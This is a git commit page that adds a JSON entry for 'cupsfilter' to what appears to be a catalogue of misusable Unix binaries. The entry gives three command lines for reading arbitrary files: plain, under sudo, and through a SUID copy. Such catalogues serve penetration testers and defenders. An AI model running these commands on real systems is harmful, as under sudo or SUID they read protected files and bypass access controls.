add data source for cups filter

master
Mr. Robot 3 years ago committed by GitHub
parent 58114cf752
commit bcde62402e
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

@ -0,0 +1,19 @@
{
"functions": {
"file-read": [
{
"code": "cupsfilter -i application/octet-stream -m application/octet-stream [file]\n"
}
],
"sudo": [
{
"code": "sudo cupsfilter -i application/octet-stream -m application/octet-stream [file]\n"
}
],
"suid": [
{
"code": "./cupsfilter -i application/octet-stream -m application/octet-stream [file]\n"
}
]
}
}
Loading…
Cancel
Save